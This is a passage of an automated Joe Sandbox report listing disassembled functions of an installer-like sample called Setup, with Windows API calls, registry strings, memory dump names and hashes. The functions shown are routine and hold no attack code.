                                                              • Instruction Fuzzy Hash: 7401D635615109FEEF004A91CC84FEE7B7CEB05768F204021F900A5450D73EDE08AF68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C623D03 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 6C623D28
                                                                • Part of subcall function 6C62182C: RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,6C622E5E,?,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C621897
                                                                • Part of subcall function 6C62182C: RegQueryValueExW.KERNEL32(6C622E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C6218B3
                                                                • Part of subcall function 6C62182C: RegCloseKey.KERNEL32(6C622E5E,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C6218D1
                                                              • SetLastError.KERNEL32(00000000,80000001,Software\Microsoft\SQMClient,UserId,?,00000027), ref: 6C623D74
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CloseErrorLastOpenQueryValuememset
                                                              • String ID: Software\Microsoft\SQMClient$UserId
                                                              • API String ID: 895213837-3032788761
                                                              • Opcode ID: 1457cdad7a41a1184cb32b412057dc94e4f0ab91276bd3ec8f566cc3bbbde287
                                                              • Instruction ID: 7a733658628c99a10ba7ff0739a9bb039950cb4a4dfb11d63aa5b79d18c8b0b8
                                                              • Opcode Fuzzy Hash: 1457cdad7a41a1184cb32b412057dc94e4f0ab91276bd3ec8f566cc3bbbde287
                                                              • Instruction Fuzzy Hash: 95213632644284AFDB00EEA4CCC4F9A37A9AB4274DF108435F906AB991C779CD488F8C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C622E0F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 6C622E34
                                                                • Part of subcall function 6C62182C: RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,6C622E5E,?,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C621897
                                                                • Part of subcall function 6C62182C: RegQueryValueExW.KERNEL32(6C622E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C6218B3
                                                                • Part of subcall function 6C62182C: RegCloseKey.KERNEL32(6C622E5E,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C6218D1
                                                              • SetLastError.KERNEL32(00000000,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C622E80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CloseErrorLastOpenQueryValuememset
                                                              • String ID: MachineId$Software\Microsoft\SQMClient
                                                              • API String ID: 895213837-1718750536
                                                              • Opcode ID: 89caf5596872d56e74dca2e899afbd0ae32703bbee13b07418c478d5558a34fe
                                                              • Instruction ID: d0cb511ff3debd84b5d9be22079b606c79838a303a4f6a6abe6f4a1c1caa7d7d
                                                              • Opcode Fuzzy Hash: 89caf5596872d56e74dca2e899afbd0ae32703bbee13b07418c478d5558a34fe
                                                              • Instruction Fuzzy Hash: BD214832214294ABDB00EEA48CC4F9E3769EB5139DF108038FA459B992CB7DCD498F4D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C623679 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,6C62332F,?), ref: 6C623683
                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,6C62332F,?), ref: 6C6236B3
                                                                • Part of subcall function 6C622815: GetTokenInformation.KERNELBASE(?,/3bl,00000000,00000000,00000000,00000000,00000000,?,?,6C6236C7,?,00000001), ref: 6C622835
                                                                • Part of subcall function 6C622815: GetLastError.KERNEL32(?,?,6C6236C7,?,00000001,?,?,?,?,6C62332F,?), ref: 6C62283B
                                                                • Part of subcall function 6C622815: GetTokenInformation.KERNELBASE(?,?,00000000,?,?,?,?,6C6236C7,?,00000001,?,?,?,?,6C62332F,?), ref: 6C622863
                                                              • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 6C6236D5
                                                              • FindCloseChangeNotification.KERNEL32(?,?,00000001,?,?,?,?,6C62332F,?), ref: 6C6236E0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Token$InformationProcess$ChangeCloseConvertCurrentErrorFindLastNotificationOpenString
                                                              • String ID:
                                                              • API String ID: 3562588798-0
                                                              • Opcode ID: 6dc5b766c71d35a82bf9f5408260977f0305ccb433d26a9b641dd2837f4f60b0
                                                              • Instruction ID: e7c8b6c41f5bda764af2c0af8a345cf7a57c768b9a7f2df5093bd6d19f8b5c18
                                                              • Opcode Fuzzy Hash: 6dc5b766c71d35a82bf9f5408260977f0305ccb433d26a9b641dd2837f4f60b0
                                                              • Instruction Fuzzy Hash: E111B231601154AFDB109F65C885E9D7ABCEF057A8F208078F801A7650CB7ACD559F5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C96C0AA Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C96BFB3: __FF_MSGBANNER.LIBCMT ref: 6C96BFCC
                                                                • Part of subcall function 6C96BFB3: __NMSG_WRITE.LIBCMT ref: 6C96BFD3
                                                                • Part of subcall function 6C96BFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,6C94831D,00000000,?,6C96C0C9,6C94F845,00000C00,00000020,6C94F845,?), ref: 6C96BFF8
                                                              • std::exception::exception.LIBCMT ref: 6C96C0F9
                                                              • std::exception::exception.LIBCMT ref: 6C96C113
                                                              • __CxxThrowException@8.LIBCMT ref: 6C96C124
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                              • String ID:
                                                              • API String ID: 615853336-0
                                                              • Opcode ID: 3d5010fad6b17f8514e1caf32c0a8d5a5fcf5146ae9a1084b19379f47db36409
                                                              • Instruction ID: 2392bf768e370fdce641e3f9fc8c4594e65b2aaebe2c060979eaa9750852ea65
                                                              • Opcode Fuzzy Hash: 3d5010fad6b17f8514e1caf32c0a8d5a5fcf5146ae9a1084b19379f47db36409
                                                              • Instruction Fuzzy Hash: 23F02871505249ABEF10EF9ADC12BDD3AB8AF6235CF240449F82496ED0DB70DA098761
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4A91B7 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _malloc.LIBCMT ref: 6C4A91D1
                                                                • Part of subcall function 6C4A8FCB: __FF_MSGBANNER.LIBCMT ref: 6C4A8FE4
                                                                • Part of subcall function 6C4A8FCB: __NMSG_WRITE.LIBCMT ref: 6C4A8FEB
                                                                • Part of subcall function 6C4A8FCB: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,?,?,6C4A91D6,?), ref: 6C4A9010
                                                              • std::exception::exception.LIBCMT ref: 6C4A9206
                                                              • std::exception::exception.LIBCMT ref: 6C4A9220
                                                              • __CxxThrowException@8.LIBCMT ref: 6C4A9231
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                              • String ID:
                                                              • API String ID: 615853336-0
                                                              • Opcode ID: 550dbcb42b5558141b89bfb54b102c5bf45a13aaca1c1a0f1885ed333454db30
                                                              • Instruction ID: b31a155b3518dde014b996d791484d455f5884e0c2be68f666b7384ce5dfc9b8
                                                              • Opcode Fuzzy Hash: 550dbcb42b5558141b89bfb54b102c5bf45a13aaca1c1a0f1885ed333454db30
                                                              • Instruction Fuzzy Hash: 5EF0F4755041096AEF04DBD4C849EDDBBB9AB61718F10000AEC21A2E94CFB2CB0BC2A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000335E5 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32(00000000,00032AE3), ref: 000335E8
                                                              • __malloc_crt.LIBCMT ref: 00033617
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00033624
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3249976406.0000000000031000.00000020.00000001.01000000.00000009.sdmp, Offset: 00030000, based on PE: true
                                                              • Associated: 00000004.00000002.3249837396.0000000000030000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.3251530207.0000000000038000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.3252634934.000000000003A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_30000_Setup.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentStrings$Free__malloc_crt
                                                              • String ID:
                                                              • API String ID: 237123855-0
                                                              • Opcode ID: 1b060288efe8ce3924a19be0cb6d15ca8ee401c266e689901c210b0ceea57d7f
                                                              • Instruction ID: 156547eebc0d607e9af368cf78527fe211454589dfa3b7db37f5d6ebe82397a0
                                                              • Opcode Fuzzy Hash: 1b060288efe8ce3924a19be0cb6d15ca8ee401c266e689901c210b0ceea57d7f
                                                              • Instruction Fuzzy Hash: AAF0E27B501410AECB776B34BC8B89B27ACCBD536071A8516F402C7200FA248F8582A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9154FB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemInfo.KERNEL32(?), ref: 6C915562
                                                                • Part of subcall function 6C914FAC: _memset.LIBCMT ref: 6C914FB4
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3InfoSystem_memset
                                                              • String ID: %s - %s %s %s$Unknown OS
                                                              • API String ID: 3853411852-1218788732
                                                              • Opcode ID: b025162bc73616c3e404471a2db46494157a31bc20c636192b9f438a9b70e2e0
                                                              • Instruction ID: 07a69ee50bfa3b75380ab53d3255c5504e10565a480ed855eadf50a60457f864
                                                              • Opcode Fuzzy Hash: b025162bc73616c3e404471a2db46494157a31bc20c636192b9f438a9b70e2e0
                                                              • Instruction Fuzzy Hash: E0417F721083849FD721CF64C841A8BBBE8BFA9758F140E1EF09497B90DB30D5498B96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C924397 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92439E
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91A5D0: __EH_prolog3.LIBCMT ref: 6C91A5D7
                                                                • Part of subcall function 6C91A5D0: SysFreeString.OLEAUT32(?), ref: 6C91A62B
                                                                • Part of subcall function 6C948863: _wcschr.LIBCMT ref: 6C94887A
                                                                • Part of subcall function 6C9244EA: __EH_prolog3.LIBCMT ref: 6C9244F1
                                                                • Part of subcall function 6C9244EA: __CxxThrowException@8.LIBCMT ref: 6C9245E9
                                                                • Part of subcall function 6C924613: RegCloseKey.ADVAPI32(?,00000034,00000034,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C9242F8,6C90A794,02642228), ref: 6C92468D
                                                                • Part of subcall function 6C924613: RegCloseKey.ADVAPI32(?,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C9242F8,6C90A794,02642228), ref: 6C92469E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Close$Exception@8FreeStringThrow_wcschr
                                                              • String ID: RegKey$RegValueName
                                                              • API String ID: 3842226755-3571311812
                                                              • Opcode ID: 0458264e584017ebcc682287d4fce69e378e515519ee0dd08b539c4f17487da2
                                                              • Instruction ID: ada2f5854fc76d01168f9895f8b883e56e6a57dfdb13ca065c353c4ea03673c8
                                                              • Opcode Fuzzy Hash: 0458264e584017ebcc682287d4fce69e378e515519ee0dd08b539c4f17487da2
                                                              • Instruction Fuzzy Hash: 24418C31A0024D9FDF10DBB8C944ADEB7B9AF25368F144255E424EBB80DB74DE09CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C924265 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92426C
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91A63E: __EH_prolog3.LIBCMT ref: 6C91A645
                                                                • Part of subcall function 6C91A63E: SysFreeString.OLEAUT32(?), ref: 6C91A69B
                                                                • Part of subcall function 6C924397: __EH_prolog3.LIBCMT ref: 6C92439E
                                                              • GetUserDefaultUILanguage.KERNEL32(6C90A794,02642228), ref: 6C924302
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$DefaultFreeLanguageStringUser
                                                              • String ID: LCIDHint
                                                              • API String ID: 188276182-1583853939
                                                              • Opcode ID: 36ce736aa62736b3ff5b220d94dfc464c4e12403ad4d21b537007d8cfe584c4e
                                                              • Instruction ID: ebeb746931d8938832bba1dabcc84ee5bcf4edf0fb0b163b9565e67b72841058
                                                              • Opcode Fuzzy Hash: 36ce736aa62736b3ff5b220d94dfc464c4e12403ad4d21b537007d8cfe584c4e
                                                              • Instruction Fuzzy Hash: 67419071A10209DFDB04CBA8C984ADE77B9BF54318F204558E465EBA94CB35DE05CF60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C49E1AD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetThreadLocale.KERNEL32(00000000), ref: 6C49E1FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: LocaleThread
                                                              • String ID: UiInfo.xml
                                                              • API String ID: 635194068-3938134364
                                                              • Opcode ID: 2de1712a3ec46e2d7f1613997e54c376758ddd9bdad3b042a9813642c2ac061f
                                                              • Instruction ID: 6466b577d70369b2ea9d9d2a4b8871de44a1733c5204683cb55cfeef26f649c9
                                                              • Opcode Fuzzy Hash: 2de1712a3ec46e2d7f1613997e54c376758ddd9bdad3b042a9813642c2ac061f
                                                              • Instruction Fuzzy Hash: 09416C756087409FD710DF68C488F5ABBE4BB49318F104A1DF8A687B90DB35E909CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C936E46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C936E4D
                                                                • Part of subcall function 6C9350B2: __EH_prolog3.LIBCMT ref: 6C9350B9
                                                                • Part of subcall function 6C9350B2: GetLastError.KERNEL32(00000000,LoadLibrary,00000000,0000000C,6C936E7F,00000000,?), ref: 6C935110
                                                                • Part of subcall function 6C9350B2: __CxxThrowException@8.LIBCMT ref: 6C93512D
                                                              • GetCommandLineW.KERNEL32(00000000,?), ref: 6C936E8F
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                                • Part of subcall function 6C913A16: __EH_prolog3.LIBCMT ref: 6C913A1D
                                                                • Part of subcall function 6C93516F: FreeLibrary.KERNEL32(00000000,?,6C9350F8,00000000,0000000C,6C936E7F,00000000,?), ref: 6C93517C
                                                                • Part of subcall function 6C93516F: LoadLibraryW.KERNEL32(?,?,?,6C9350F8,00000000,0000000C,6C936E7F,00000000,?), ref: 6C935194
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C95ABA1: __EH_prolog3.LIBCMT ref: 6C95ABA8
                                                                • Part of subcall function 6C95ABA1: GetProcAddress.KERNEL32(00000004,CreateClassFactory), ref: 6C95ABB8
                                                                • Part of subcall function 6C95ABA1: GetLastError.KERNEL32 ref: 6C95ABC6
                                                                • Part of subcall function 6C95ABA1: __CxxThrowException@8.LIBCMT ref: 6C95AC7D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$ErrorException@8LastLibraryThrow$AddressCommandFreeLineLoadProc_malloc
                                                              • String ID: passive
                                                              • API String ID: 304155978-1995439567
                                                              • Opcode ID: e70d1da28719a52b4261b04501e25754a9daa91b28f1dfc0605e08345421c2d9
                                                              • Instruction ID: e5e0d4f92f3be33dacc54570b03683b4c1d6ca11f6d91e6395a2613fd7312cc7
                                                              • Opcode Fuzzy Hash: e70d1da28719a52b4261b04501e25754a9daa91b28f1dfc0605e08345421c2d9
                                                              • Instruction Fuzzy Hash: 9231CA729153299BDB10DFA4C8007DDBBB4BF28318F145959E859ABF80CB70DA18CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C949268 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C94926F
                                                                • Part of subcall function 6C9502A3: __EH_prolog3.LIBCMT ref: 6C9502AA
                                                                • Part of subcall function 6C9502A3: GetCommandLineW.KERNEL32(0000001C,6C949382,02642228,6C90A794,?,6C91BFC7,00000018,6C91BC3C,0264224C,?,?,?,?,?,?,UserExperienceDataCollection), ref: 6C9502AF
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CommandLine
                                                              • String ID: Policy$UserExperienceDataCollection
                                                              • API String ID: 1384747822-3168315836
                                                              • Opcode ID: 56dd4e82b7e07c52c55ad85a4e662a6d45ae9f4eb721615215f69c84dabcb1e3
                                                              • Instruction ID: 4e9dbe387b83975a01512b92f634e76afee41bd6f371f94ec49cd8160d405f2e
                                                              • Opcode Fuzzy Hash: 56dd4e82b7e07c52c55ad85a4e662a6d45ae9f4eb721615215f69c84dabcb1e3
                                                              • Instruction Fuzzy Hash: 4F319070A01249DFDB04DFA8C944BAE7BB9BF65318F148558F815DBB81CB30DA04CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C921EBF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C921EC6
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C9219AD: __EH_prolog3.LIBCMT ref: 6C9219B4
                                                                • Part of subcall function 6C9219AD: __CxxThrowException@8.LIBCMT ref: 6C921ADE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: BlockIf$DisplayText
                                                              • API String ID: 2489616738-2498774408
                                                              • Opcode ID: a4a3a40d56413861a86e4c68623c513436be27123e8e856df3900707b39b9229
                                                              • Instruction ID: 8533f06820f821bf05b515a16859376c654c2ff76044dae1dc706ff185006379
                                                              • Opcode Fuzzy Hash: a4a3a40d56413861a86e4c68623c513436be27123e8e856df3900707b39b9229
                                                              • Instruction Fuzzy Hash: E7318E71910209AFCF04CFA8C941ADE77B9BF65358F148549F820ABB40C730EE19CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9257E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9257EC
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • _memcpy_s.LIBCMT ref: 6C925887
                                                              Strings
                                                              Memory Dump Source
